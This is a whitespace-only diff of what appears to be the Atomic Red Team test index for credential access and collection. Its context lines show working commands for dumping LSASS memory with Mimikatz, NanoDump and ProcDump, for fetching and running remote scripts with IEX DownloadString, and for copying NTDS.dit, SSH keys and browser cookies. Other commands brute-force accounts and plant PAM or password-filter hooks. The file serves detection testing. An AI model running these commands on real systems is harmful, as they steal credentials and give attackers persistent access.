- description: 'Dumpert executable must exist on disk at specified location
(#{dumpert_exe})
-'
+ '
prereq_command: 'if (Test-Path #{dumpert_exe}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -ItemType Directory (Split-Path #{dumpert_exe}) -Force | Out-Null
@@ -3857,7 +3857,7 @@ credential-access:
command: "#{dumpert_exe}\n"
cleanup_command: 'del C:\windows\temp\dumpert.dmp >nul 2> nul
-'
+ '
name: command_prompt
elevation_required: true
- name: Dump LSASS.exe Memory using NanoDump
@@ -3875,21 +3875,21 @@ credential-access:
- description: 'NanoDump executable must exist on disk at specified location
($env:TEMP\nanodump.x64.exe)
-'
+ '
prereq_command: 'if (Test-Path $env:TEMP\nanodump.x64.exe) {exit 0} else {exit
1}
-'
+ '
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://github.com/helpsystems/nanodump/raw/84db0c1737bbe027431733c193cfacf59a07259b/compiled/nanodump.x64.exe" -OutFile "$env:TEMP\nanodump.x64.exe"
executor:
command: '%temp%\nanodump.x64.exe -w "%temp%\nanodump.dmp"
-'
+ '
cleanup_command: 'del "%temp%\nanodump.dmp" >nul 2> nul
-'
+ '
name: command_prompt
elevation_required: true
- name: Dump LSASS.exe Memory using Windows Task Manager
@@ -3932,10 +3932,10 @@ credential-access:
dependencies:
- description: 'Mimikatz must exist on disk at specified location (#{mimikatz_exe})
-'
+ '
prereq_command: 'if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
$mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
@@ -3945,19 +3945,19 @@ credential-access:
Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe #{mimikatz_exe} -Force
- description: 'Lsass dump must exist at specified location (#{input_file})
-'
+ '
prereq_command: 'cmd /c "if not exist #{input_file} (exit /b 1)"
-'
+ '
get_prereq_command: 'Write-Host "Create the lsass dump manually using the
steps in the previous test (Dump LSASS.exe Memory using Windows Task Manager)"
-'
+ '
executor:
command: '#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords
full" exit
-'
+ '
name: command_prompt
elevation_required: true
- name: LSASS read with pypykatz
@@ -3974,35 +3974,35 @@ credential-access:
dependencies:
- description: 'Computer must have python 3 installed
-'
+ '
prereq_command: |
py -3 --version >nul 2>&1
exit /b %errorlevel%
get_prereq_command: 'echo "Python 3 must be installed manually"
-'
+ '
- description: 'Computer must have pip installed
-'
+ '
prereq_command: |
py -3 -m pip --version >nul 2>&1
exit /b %errorlevel%
get_prereq_command: 'echo "PIP must be installed manually"
-'
+ '
- description: 'pypykatz must be installed and part of PATH
-'
+ '
prereq_command: |
pypykatz -h >nul 2>&1
exit /b %errorlevel%
get_prereq_command: 'pip install pypykatz
-'
+ '
executor:
command: 'pypykatz live lsa
-'
+ '
name: command_prompt
elevation_required: true
- name: Dump LSASS.exe Memory using Out-Minidump.ps1
@@ -4019,7 +4019,7 @@ credential-access:
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump
cleanup_command: 'Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore
-'
+ '
name: powershell
elevation_required: true
- name: Create Mini Dump of LSASS.exe using ProcDump
@@ -4047,10 +4047,10 @@ credential-access:
- description: 'ProcDump tool from Sysinternals must exist on disk at specified
location (#{procdump_exe})
-'
+ '
prereq_command: 'if (Test-Path #{procdump_exe}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip"
Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force
@@ -4060,7 +4060,7 @@ credential-access:
command: "#{procdump_exe} -accepteula -mm lsass.exe #{output_file}\n"
cleanup_command: 'del "#{output_file}" >nul 2> nul
-'
+ '
name: command_prompt
elevation_required: true
- name: Powershell Mimikatz
@@ -4082,7 +4082,7 @@ credential-access:
command: 'IEX (New-Object Net.WebClient).DownloadString(''#{remote_script}'');
Invoke-Mimikatz -DumpCreds
-'
+ '
name: powershell
elevation_required: true
- name: Dump LSASS with .Net 5 createdump.exe
@@ -4104,15 +4104,15 @@ credential-access:
dependencies:
- description: 'Computer must have createdump.exe from .Net 5
-'
+ '
prereq_command: 'if (Test-Path ''#{createdump_exe}'') {exit 0} else {exit
1}
-'
+ '
get_prereq_command: 'echo ".NET 5 must be installed manually." "For the very
brave a copy of the executable can be found here: https://github.com/Scoubi/RedTeam-Tools/blob/main/createdump.exe"
-'
+ '
executor:
command: |
echo "Createdump Path #{createdump_exe}"
@@ -4122,7 +4122,7 @@ credential-access:
& "#{createdump_exe}" -u -f #{output_file} $ID
cleanup_command: 'Remove-Item #{output_file} -ErrorAction Ignore
-'
+ '
name: powershell
elevation_required: true
- name: Dump LSASS.exe using imported Microsoft DLLs
@@ -4147,10 +4147,10 @@ credential-access:
dependencies:
- description: 'Computer must have xordump.exe
-'
+ '
prereq_command: 'if (Test-Path ''#{xordump_exe}'') {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe}
@@ -4158,7 +4158,7 @@ credential-access:
command: "#{xordump_exe} -out #{output_file} -x 0x41\n"
cleanup_command: 'Remove-Item #{output_file} -ErrorAction Ignore
-'
+ '
name: powershell
elevation_required: true
T1556:
@@ -4315,19 +4315,19 @@ credential-access:
dependencies:
- description: 'Target must be a Domain Controller
-'
+ '
prereq_command: 'reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v
ProductType | findstr LanmanNT
-'
+ '
get_prereq_command: 'echo Sorry, Promoting this machine to a Domain Controller
must be done manually
-'
+ '
executor:
command: 'vssadmin.exe create shadow /for=#{drive_letter}
-'
+ '
name: command_prompt
elevation_required: true
- name: Copy NTDS.dit from Volume Shadow Copy
@@ -4354,34 +4354,34 @@ credential-access:
dependencies:
- description: 'Target must be a Domain Controller
-'
+ '
prereq_command: 'reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v
ProductType | findstr LanmanNT
-'
+ '
get_prereq_command: 'echo Sorry, Promoting this machine to a Domain Controller
must be done manually
-'
+ '
- description: 'Volume shadow copy must exist
-'
+ '
prereq_command: 'if not exist #{vsc_name} (exit /b 1)
-'
+ '
get_prereq_command: 'echo Run "Invoke-AtomicTest T1003.003 -TestName ''Create
Volume Shadow Copy with vssadmin''" to fulfill this requirement
-'
+ '
- description: 'Extract path must exist
-'
+ '
prereq_command: 'if not exist #{extract_path} (exit /b 1)
-'
+ '
get_prereq_command: 'mkdir #{extract_path}
-'
+ '
executor:
command: |
copy #{vsc_name}\Windows\NTDS\NTDS.dit #{extract_path}\ntds.dit
@@ -4413,22 +4413,22 @@ credential-access:
dependencies:
- description: 'Target must be a Domain Controller
-'
+ '
prereq_command: 'reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v
ProductType | findstr LanmanNT
-'
+ '
get_prereq_command: 'echo Sorry, Promoting this machine to a Domain Controller
must be done manually
-'
+ '
executor:
command: |
mkdir #{output_folder}
ntdsutil "ac i ntds" "ifm" "create full #{output_folder}" q q
cleanup_command: 'rmdir /q /s #{output_folder} >nul 2>&1
-'
+ '
name: command_prompt
elevation_required: true
- name: Create Volume Shadow Copy with WMI
@@ -4447,19 +4447,19 @@ credential-access:
dependencies:
- description: 'Target must be a Domain Controller
-'
+ '
prereq_command: 'reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v
ProductType | findstr LanmanNT
-'
+ '
get_prereq_command: 'echo Sorry, Promoting this machine to a Domain Controller
must be done manually
-'
+ '
executor:
command: 'wmic shadowcopy call create Volume=#{drive_letter}
-'
+ '
name: command_prompt
elevation_required: true
- name: Create Volume Shadow Copy remotely with WMI
@@ -4482,18 +4482,18 @@ credential-access:
- description: 'Target must be a reachable Domain Controller, and current context
must be domain admin
-'
+ '
prereq_command: 'wmic /node:"#{target_host}" shadowcopy list brief
-'
+ '
get_prereq_command: 'echo Sorry, can''t connect to target host, check: network,
firewall or permissions (must be admin on target)
-'
+ '
executor:
command: 'wmic /node:"#{target_host}" shadowcopy call create Volume=#{drive_letter}
-'
+ '
name: command_prompt
elevation_required: true
- name: Create Volume Shadow Copy remotely (WMI) with esentutl
@@ -4520,19 +4520,19 @@ credential-access:
- description: 'Target must be a reachable Domain Controller, and current context
must be domain admin
-'
+ '
prereq_command: 'wmic /node:"#{target_host}" shadowcopy list brief
-'
+ '
get_prereq_command: 'echo Sorry, can''t connect to target host, check: network,
firewall or permissions (must be admin on target)
-'
+ '
executor:
command: 'wmic /node:"#{target_host}" process call create "cmd.exe /c esentutl.exe
/y /vss #{source_path} /d #{target_path}"
-'
+ '
name: command_prompt
elevation_required: true
- name: Create Volume Shadow Copy with Powershell
@@ -4696,11 +4696,11 @@ credential-access:
dependencies:
- description: 'Check if at least one of tcpdump or tshark is installed.
-'
+ '
prereq_command: 'if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command
-v tshark)" ]; then exit 1; else exit 0; fi;
-'
+ '
get_prereq_command: "(which yum && yum -y install epel-release tcpdump tshark)||(which
apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark)\n"
executor:
@@ -4726,11 +4726,11 @@ credential-access:
dependencies:
- description: 'Check if at least one of tcpdump or tshark is installed.
-'
+ '
prereq_command: 'if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command
-v tshark)" ]; then exit 1; else exit 0; fi;
-'
+ '
get_prereq_command: "(which yum && yum -y install epel-release tcpdump tshark)||(which
apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark)\n"
executor:
@@ -4773,14 +4773,14 @@ credential-access:
- description: 'tshark must be installed and in the default path of "c:\Program
Files\Wireshark\Tshark.exe".
-'
+ '
prereq_command: if (test-path "#{tshark_path}") {exit 0} else {exit 1}
get_prereq_command: |
Invoke-WebRequest -OutFile $env:temp\wireshark_installer.exe #{wireshark_url}
Start-Process $env:temp\wireshark_installer.exe /S
- description: 'npcap must be installed.
-'
+ '
prereq_command: if (test-path "#{npcap_path}") {exit 0} else {exit 1}
get_prereq_command: |
Invoke-WebRequest -OutFile $env:temp\npcap_installer.exe #{npcap_url}
@@ -4788,7 +4788,7 @@ credential-access:
executor:
command: '"c:\Program Files\Wireshark\tshark.exe" -i #{interface} -c 5
-'
+ '
name: command_prompt
elevation_required: true
- name: Windows Internal Packet Capture
@@ -4955,10 +4955,10 @@ credential-access:
dependencies:
- description: 'Gsecdump must exist on disk at specified location (#{gsecdump_exe})
-'
+ '
prereq_command: 'if (Test-Path #{gsecdump_exe}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
$parentpath = Split-Path "#{gsecdump_exe}"; $binpath = "$parentpath\gsecdump-v2b5.exe"
@@ -5023,7 +5023,7 @@ credential-access:
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump $id $env:TEMP\svchost-exe.dmp full
cleanup_command: 'Remove-Item $env:TEMP\svchost-exe.dmp -ErrorAction Ignore
-'
+ '
name: powershell
elevation_required: true
T1110.002:
@@ -5191,7 +5191,7 @@ credential-access:
description: 'Uses PowerShell to install and register a password filter DLL.
Requires a reboot and administrative privileges.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -5204,14 +5204,14 @@ credential-access:
- description: 'AtomicPasswordFilter.dll must exist on disk at specified location
(#{input_dll})
-'
+ '
prereq_command: 'if (Test-Path #{input_dll}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Write-Host "You must provide your own password filter
dll"
-'
+ '
executor:
command: |
$passwordFilterName = (Copy-Item "#{input_dll}" -Destination "C:\Windows\System32" -PassThru).basename
@@ -5303,7 +5303,7 @@ credential-access:
description: 'Attempts to brute force a single Active Directory account by testing
connectivity to the IPC$ share on a domain controller
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -5326,7 +5326,7 @@ credential-access:
description: 'Attempt to brute force Active Directory domain user on a domain
controller, via LDAP, with NTLM or Kerberos
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -5376,7 +5376,7 @@ credential-access:
auto_generated_guid: 5a51ef57-299e-4d62-8e11-2d440df55e69
description: 'Attempt to brute force Azure AD user via AzureAD powershell module.
-'
+ '
supported_platforms:
- azure-ad
input_arguments:
@@ -5393,14 +5393,14 @@ credential-access:
dependencies:
- description: 'AzureAD module must be installed.
-'
+ '
prereq_command: 'try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue)
{exit 0} else {exit 1}} catch {exit 1}
-'
+ '
get_prereq_command: 'Install-Module -Name AzureAD -Force
-'
+ '
executor:
name: powershell
elevation_required: false
@@ -5432,7 +5432,7 @@ credential-access:
dependencies:
- description: 'Check if running on a Debian based machine.
-'
+ '
prereq_command: |
if grep -iq "debian\|ubuntu\|kali" /usr/lib/os-release; then echo "Debian"; else echo "NOT Debian"; exit 1; fi
if grep -Rq "pam_tally" /etc/pam.d/*; then echo "pam_tally configured"; exit 1; fi
@@ -5440,7 +5440,7 @@ credential-access:
if [ -x "$(command -v openssl)" ]; then echo "openssl installed"; else echo "install openssl"; fi
get_prereq_command: 'apt-get update && apt-get install -y openssl sudo
-'
+ '
executor:
elevation_required: true
command: |
@@ -5463,7 +5463,7 @@ credential-access:
rm /tmp/file
cleanup_command: 'userdel target
-'
+ '
name: sh
- name: SUDO brute force Redhat
auto_generated_guid: b72958a7-53e3-4809-9ee1-58f6ecd99ade
@@ -5475,7 +5475,7 @@ credential-access:
dependencies:
- description: 'Check if running on a Redhat based machine.
-'
+ '
prereq_command: |
if grep -iq "rhel\|fedora\|centos" /usr/lib/os-release; then echo "Redhat"; else echo "NOT Redhat"; exit 1; fi
if grep -Rq "pam_faillock" /etc/pam.d/*; then echo "pam_faillock configured"; exit 1; fi
@@ -5483,7 +5483,7 @@ credential-access:
if [ -x "$(command -v openssl)" ]; then echo "openssl installed"; else echo "install openssl"; fi
get_prereq_command: 'yum -y update && yum install -y openssl sudo
-'
+ '
executor:
elevation_required: true
command: |
@@ -5506,7 +5506,7 @@ credential-access:
rm /tmp/file
cleanup_command: 'userdel target
-'
+ '
name: sh
T1555.005:
technique:
@@ -5672,13 +5672,13 @@ credential-access:
dependencies:
- description: 'List of domain users to password spray must exits at %temp%\users.txt
-'
+ '
prereq_command: 'if not exist %temp%\users.txt (exit /b 1)
-'
+ '
get_prereq_command: 'PathToAtomicsFolder\T1110.003\src\parse_net_users.bat
-'
+ '
executor:
name: command_prompt
elevation_required: false
@@ -5686,7 +5686,7 @@ credential-access:
/user:"%userdomain%\%n" "#{password}" 1>NUL 2>&1 && @echo [*] %n:#{password}
&& @net use /delete %logonserver%\IPC$ > NUL
-'
+ '
- name: Password Spray (DomainPasswordSpray)
auto_generated_guid: 263ae743-515f-4786-ac7d-41ef3a0d4b2b
description: |
@@ -5785,14 +5785,14 @@ credential-access:
dependencies:
- description: 'AzureAD module must be installed.
-'
+ '
prereq_command: 'try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue)
{exit 0} else {exit 1}} catch {exit 1}
-'
+ '
get_prereq_command: 'Install-Module -Name AzureAD -Force
-'
+ '
executor:
name: powershell
elevation_required: false
@@ -5912,10 +5912,10 @@ credential-access:
elevation_required: true
command: 'sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf}
-'
+ '
cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf}
-'
+ '
- name: Malicious PAM module
auto_generated_guid: 65208808-3125-4a2e-8389-a0a00e9ab326
description: |
@@ -5949,35 +5949,35 @@ credential-access:
- description: 'The PAM development library must be installed to build the PAM
module
-'
+ '
prereq_command: 'if [ -f /usr/include/security/pam_modules.h ]; then exit
0; else exit 1; fi;
-'
+ '
get_prereq_command: 'if [ -n "`which apt-get`" ]; then sudo apt-get -y install
libpam0g-dev; elif [ -n "`which yum`" ]; then sudo yum -y install pam-devel;
fi
-'
+ '
- description: 'The PAM module must exist on disk at specified location (#{path_to_pam_module})
-'
+ '
prereq_command: 'if [ -f #{path_to_pam_module} ]; then exit 0; else exit 1;
fi;
-'
+ '
get_prereq_command: 'sudo gcc -shared -fPIC -o #{path_to_pam_module} #{path_to_pam_module_source}
-'
+ '
executor:
name: sh
elevation_required: true
command: 'sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf}
-'
+ '
cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf}
-'
+ '
T1552.004:
technique:
object_marking_refs:
@@ -6052,14 +6052,14 @@ credential-access:
executor:
command: 'dir c:\ /b /s .key | findstr /e .key
-'
+ '
name: command_prompt
elevation_required: true
- name: Discover Private SSH Keys
auto_generated_guid: 46959285-906d-40fa-9437-5a439accd878
description: 'Discover private SSH keys on a macOS or Linux system.
-'
+ '
supported_platforms:
- macos
- linux
@@ -6075,17 +6075,17 @@ credential-access:
executor:
command: 'find #{search_path} -name id_rsa >> #{output_file}
-'
+ '
cleanup_command: 'rm #{output_file}
-'
+ '
name: sh
- name: Copy Private SSH Keys with CP
auto_generated_guid: 7c247dc7-5128-4643-907b-73a76d9135c3
description: 'Copy private SSH keys on a Linux system to a staging folder using
the `cp` command.
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -6103,14 +6103,14 @@ credential-access:
find #{search_path} -name id_rsa -exec cp --parents {} #{output_folder} \;
cleanup_command: 'rm #{output_folder}
-'
+ '
name: sh
- name: Copy Private SSH Keys with rsync
auto_generated_guid: 864bb0b2-6bb5-489a-b43b-a77b3a16d68a
description: 'Copy private SSH keys on a Linux or macOS system to a staging
folder using the `rsync` command.
-'
+ '
supported_platforms:
- macos
- linux
@@ -6129,14 +6129,14 @@ credential-access:
find #{search_path} -name id_rsa -exec rsync -R {} #{output_folder} \;
cleanup_command: 'rm -rf #{output_folder}
-'
+ '
name: sh
- name: Copy the users GnuPG directory with rsync
auto_generated_guid: 2a5a0601-f5fb-4e2e-aa09-73282ae6afca
description: 'Copy the users GnuPG (.gnupg) directory on a Mac or Linux system
to a staging folder using the `rsync` command.
-'
+ '
supported_platforms:
- macos
- linux
@@ -6155,7 +6155,7 @@ credential-access:
find #{search_path} -type d -name '.gnupg' -exec rsync -Rr {} #{output_folder} \;
cleanup_command: 'rm -rf #{output_folder}
-'
+ '
name: sh
- name: ADFS token signing and encryption certificates theft - Local
auto_generated_guid: 78e95057-d429-4e66-8f82-0f060c1ac96f
@@ -6168,13 +6168,13 @@ credential-access:
dependencies:
- description: 'AADInternals module must be installed.
-'
+ '
prereq_command: 'if (Get-Module AADInternals) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Install-Module -Name AADInternals -Force
-'
+ '
executor:
command: |
Import-Module AADInternals -Force
@@ -6214,14 +6214,14 @@ credential-access:
dependencies:
- description: 'AADInternals and ActiveDirectory modules must be installed.
-'
+ '
prereq_command: 'if ($(Get-Module AADInternals) -or $(Get-Module -ListAvailable
-Name ActiveDirectory)) {echo 0} else {echo 1}
-'
+ '
get_prereq_command: 'Install-Module -Name AADInternals -Force
-'
+ '
executor:
command: "Import-Module ActiveDirectory -Force \nImport-Module AADInternals
-Force | Out-Null\n#Get Configuration\n$dcServerName = (Get-ADDomainController).HostName\n$svc
@@ -6316,7 +6316,7 @@ credential-access:
dependencies:
- description: 'Script to launch target process must exist
-'
+ '
prereq_command: |
test -f #{script_path}
grep "#{pid_term}" #{script_path}
@@ -6337,7 +6337,7 @@ credential-access:
grep -i "PASS" "#{output_file}"
cleanup_command: 'rm -f "#{output_file}"
-'
+ '
- name: Dump individual process memory with Python (Local)
auto_generated_guid: 437b2003-a20d-4ed8-834c-4964f24eec63
description: |
@@ -6365,7 +6365,7 @@ credential-access:
dependencies:
- description: 'Script to launch target process must exist
-'
+ '
prereq_command: |
test -f #{script_path}
grep "#{pid_term}" #{script_path}
@@ -6374,11 +6374,11 @@ credential-access:
echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
- description: 'Requires Python
-'
+ '
prereq_command: "(which python || which python3 || which python2)\n"
get_prereq_command: 'echo "Python 2.7+ or 3.4+ must be installed"
-'
+ '
executor:
name: sh
elevation_required: true
@@ -6390,7 +6390,7 @@ credential-access:
grep -i "PASS" "#{output_file}"
cleanup_command: 'rm -f "#{output_file}"
-'
+ '
- name: Capture Passwords with MimiPenguin
auto_generated_guid: a27418de-bdce-4ebd-b655-38f04842bf0c
description: "MimiPenguin is a tool inspired by MimiKatz that targets Linux
@@ -6414,40 +6414,40 @@ credential-access:
- description: 'MimiPenguin script must exist on disk at specified location
(#{MimiPenguin_Location})
-'
+ '
prereq_command: 'if [ -f "#{MimiPenguin_Location}" ]; then exit 0; else exit
1; fi;
-'
+ '
get_prereq_command: |
wget -O "/tmp/mimipenguin.tar.gz" https://github.com/huntergregal/mimipenguin/releases/download/2.0-release/mimipenguin_2.0-release.tar.gz
mkdir /tmp/mimipenguin
tar -xzvf "/tmp/mimipenguin.tar.gz" -C /tmp/mimipenguin
- description: 'Strings must be installed
-'
+ '
prereq_command: 'if [ -x "$(command -v strings --version)" ]; then exit 0;
else exit 1; fi;
-'
+ '
get_prereq_command: 'sudo apt-get -y install binutils
-'
+ '
- description: 'Python2 must be installed
-'
+ '
prereq_command: 'if [ -x "$(command -v python2 --version)" ]; then exit 0;
else exit 1; fi;
-'
+ '
get_prereq_command: "sudo apt-get -y install python2 \n"
- description: 'Libc-bin must be installed
-'
+ '
prereq_command: 'if [ -x "$(command -v ldd --version)" ]; then exit 0; else
exit 1; fi;
-'
+ '
get_prereq_command: "sudo apt-get -y install libc-bin \n"
executor:
command: |
@@ -6455,7 +6455,7 @@ credential-access:
cat #{output_file}
cleanup_command: 'rm -f #{output_file} > /dev/null
-'
+ '
name: bash
elevation_required: true
T1606.002:
@@ -6554,13 +6554,13 @@ credential-access:
dependencies:
- description: 'AADInternals module must be installed.
-'
+ '
prereq_command: 'if (Get-Module AADInternals) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Install-Module -Name AADInternals -Force
-'
+ '
executor:
command: |
Import-Module AADInternals -Force
@@ -6648,42 +6648,42 @@ credential-access:
auto_generated_guid: a96872b2-cbf3-46cf-8eb4-27e8c0e85263
description: 'Parses registry hives to obtain stored credentials
-'
+ '
supported_platforms:
- windows
dependency_executor_name: command_prompt
dependencies:
- description: 'Computer must have python 3 installed
-'
+ '
prereq_command: |
py -3 --version >nul 2>&1
exit /b %errorlevel%
get_prereq_command: 'echo "Python 3 must be installed manually"
-'
+ '
- description: 'Computer must have pip installed
-'
+ '
prereq_command: |
py -3 -m pip --version >nul 2>&1
exit /b %errorlevel%
get_prereq_command: 'echo "PIP must be installed manually"
-'
+ '
- description: 'pypykatz must be installed and part of PATH
-'
+ '
prereq_command: |
pypykatz -h >nul 2>&1
exit /b %errorlevel%
get_prereq_command: 'pip install pypykatz
-'
+ '
executor:
command: 'pypykatz live registry
-'
+ '
name: command_prompt
elevation_required: true
- name: esentutl.exe SAM copy
@@ -6709,12 +6709,12 @@ credential-access:
executor:
command: 'esentutl.exe /y /vss #{file_path} /d #{copy_dest}/#{file_name}
-'
+ '
name: command_prompt
elevation_required: true
cleanup_command: 'del #{copy_dest}\#{file_name} >nul 2>&1
-'
+ '
- name: PowerDump Hashes and Usernames from Registry
auto_generated_guid: 804f28fc-68fc-40da-b5a2-e9d0bce5c193
description: Executes a hashdump by reading the hashes from the registry.
@@ -6770,7 +6770,7 @@ credential-access:
auto_generated_guid: 9d77fed7-05f8-476e-a81b-8ff0472c64d0
description: 'Dump hives from volume shadow copies with System.IO.File
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -7086,10 +7086,10 @@ credential-access:
dependencies:
- description: 'Sqlite3 must exist at (#{sqlite3_path})
-'
+ '
prereq_command: 'if (Test-Path #{sqlite3_path}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
Invoke-WebRequest "https://www.sqlite.org/2022/sqlite-tools-win32-x86-3380200.zip" -OutFile "$env:temp\sqlite.zip"
Expand-Archive -path "$env:temp\sqlite.zip" -destinationpath "$env:temp\" -force
@@ -7100,7 +7100,7 @@ credential-access:
"select host, name, value, path, expiry, isSecure, isHttpOnly, sameSite from [moz_cookies];" | cmd /c #{sqlite3_path} "$CookieDBLocation" | out-file -filepath "#{output_file}"
cleanup_command: 'remove-item #{output_file} -erroraction silentlycontinue
-'
+ '
name: powershell
elevation_required: false
T1558:
@@ -7552,7 +7552,7 @@ credential-access:
elevation_required: false
command: 'vaultcmd /listcreds:"Windows Credentials"
-'
+ '
collection:
T1557.002:
technique:
@@ -7729,7 +7729,7 @@ collection:
elevation_required: false
command: 'dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file}
-'
+ '
cleanup_command: 'Remove-Item -path #{output_file} -ErrorAction Ignore'
T1560.003:
technique:
@@ -7825,7 +7825,7 @@ collection:
auto_generated_guid: 391f5298-b12d-4636-8482-35d9c17d53a8
description: 'Uses GZip from Python to compress files
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -7841,10 +7841,10 @@ collection:
dependencies:
- description: 'Requires Python
-'
+ '
prereq_command: 'which_python=`which python`; $which_python -V
-'
+ '
get_prereq_command: ''
executor:
name: bash
@@ -7852,15 +7852,15 @@ collection:
command: '$which_python -c "import gzip;input_file=open(''#{path_to_input_file}'',
''rb'');content=input_file.read();input_file.close();output_file=gzip.GzipFile(''#{path_to_output_file}'',''wb'',''compresslevel=6'');output_file.write(content);output_file.close();"
-'
+ '
cleanup_command: 'rm #{path_to_output_file}
-'
+ '
- name: Compressing data using bz2 in Python (Linux)
auto_generated_guid: c75612b2-9de0-4d7c-879c-10d7b077072d
description: 'Uses bz2 from Python to compress files
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -7876,25 +7876,25 @@ collection:
dependencies:
- description: 'Requires Python
-'
+ '
prereq_command: 'which_python=`which python`; $which_python -V
-'
+ '
get_prereq_command: ''
executor:
name: bash
elevation_required: false
command: '$which_python -c "import bz2;input_file=open(''#{path_to_input_file}'',''rb'');content=input_file.read();input_file.close();bz2content=bz2.compress(content,compresslevel=9);output_file=open(''#{path_to_output_file}'',''w+'');output_file.write(bz2content);output_file.close();"
-'
+ '
cleanup_command: 'rm #{path_to_output_file}
-'
+ '
- name: Compressing data using zipfile in Python (Linux)
auto_generated_guid: 001a042b-859f-44d9-bf81-fd1c4e2200b0
description: 'Uses zipfile from Python to compress files
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -7910,10 +7910,10 @@ collection:
dependencies:
- description: 'Requires Python
-'
+ '
prereq_command: 'which_python=`which python`; $which_python -V
-'
+ '
get_prereq_command: ''
executor:
name: bash
@@ -7921,15 +7921,15 @@ collection:
command: '$which_python -c "from zipfile import ZipFile; ZipFile(''#{path_to_output_file}'',
mode=''w'').write(''#{path_to_input_file}'')"
-'
+ '
cleanup_command: 'rm #{path_to_output_file}
-'
+ '
- name: Compressing data using tarfile in Python (Linux)
auto_generated_guid: e86f1b4b-fcc1-4a2a-ae10-b49da01458db
description: 'Uses tarfile from Python to compress files
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -7945,10 +7945,10 @@ collection:
dependencies:
- description: 'Requires Python
-'
+ '
prereq_command: 'which_python=`which python`; $which_python -V
-'
+ '
get_prereq_command: ''
executor:
name: bash
@@ -7957,7 +7957,7 @@ collection:
mode='w').write('#{path_to_input_file}')\" \n"
cleanup_command: 'rm #{path_to_output_file}
-'
+ '
T1560.001:
technique:
type: attack-pattern
@@ -8040,10 +8040,10 @@ collection:
dependencies:
- description: 'Rar tool must be installed at specified location (#{rar_exe})
-'
+ '
prereq_command: 'if not exist "#{rar_exe}" (exit /b 1)
-'
+ '
get_prereq_command: |
echo Downloading Winrar installer
bitsadmin /transfer myDownloadJob /download /priority normal "https://www.win-rar.com/fileadmin/winrar-versions/winrar/th/winrar-x64-580.exe" #{rar_installer}
@@ -8053,10 +8053,10 @@ collection:
elevation_required: false
command: '"#{rar_exe}" a -r #{output_file} #{input_path}\*#{file_extension}
-'
+ '
cleanup_command: 'del /f /q /s #{output_file} >nul 2>&1
-'
+ '
- name: Compress Data and lock with password for Exfiltration with winrar
auto_generated_guid: 8dd61a55-44c6-43cc-af0c-8bdda276860c
description: |
@@ -8076,10 +8076,10 @@ collection:
dependencies:
- description: 'Rar tool must be installed at specified location (#{rar_exe})
-'
+ '
prereq_command: 'if not exist "#{rar_exe}" (exit /b 1)
-'
+ '
get_prereq_command: |
echo Downloading Winrar installer
bitsadmin /transfer myDownloadJob /download /priority normal "https://www.win-rar.com/fileadmin/winrar-versions/winrar/th/winrar-x64-580.exe" #{rar_installer}
@@ -8117,11 +8117,11 @@ collection:
dependencies:
- description: 'Winzip must be installed
-'
+ '
prereq_command: 'cmd /c ''if not exist "#{winzip_exe}" (echo 1) else (echo
